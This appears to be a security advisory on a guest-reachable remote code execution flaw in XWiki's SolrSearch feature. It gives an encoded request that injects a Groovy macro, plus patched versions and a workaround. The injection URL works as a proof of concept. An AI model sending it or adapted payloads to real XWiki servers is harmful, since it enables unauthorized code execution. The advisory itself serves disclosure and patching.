XWiki Platform is a widely used wiki platform offering runtime services for various applications. However, a critical security vulnerability has recently been discovered which allows any guest to perform arbitrary remote code execution via a request to the SolrSearch feature. This issue poses a severe threat to the confidentiality, integrity, and availability of the entire XWiki installation.

Exploit Details

The exploit uses a malformed request to SolrSearch to trigger the remote code execution. Here is a sample code snippet, which reproduces the issue without needing to log in:

<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20

If the title of the returned RSS feed contains Hello from search text:42, it indicates that the XWiki instance is vulnerable to this attack.

Official References

1. XWiki Security Advisory - The official advisory for this vulnerability, which provides further details and recommendations.

2. XWiki Patch Notes - Release notes for the latest patch versions, including security fixes.

Patching Recommendations

This vulnerability has been resolved in XWiki versions 15.10.11, 16.4.1, and 16.5.RC1. All users are strongly advised to upgrade to the latest version to protect their installations from this critical security flaw.

For those unable to upgrade immediately, a temporary workaround is available by making the following change in the Main.SolrSearchMacros file:

Replace the line with the rawResponse macro found in macros.vm#L2824.

3. Make sure the content type for this macro is set to application/xml.

Save and close the file.

Remember that this workaround is temporary and should not replace the upgrade process to a patched version of XWiki. Users are urged to perform the recommended upgrade as soon as possible to ensure the security and stability of their XWiki instances.

Timeline

Published on: 02/20/2025 20:15:46 UTC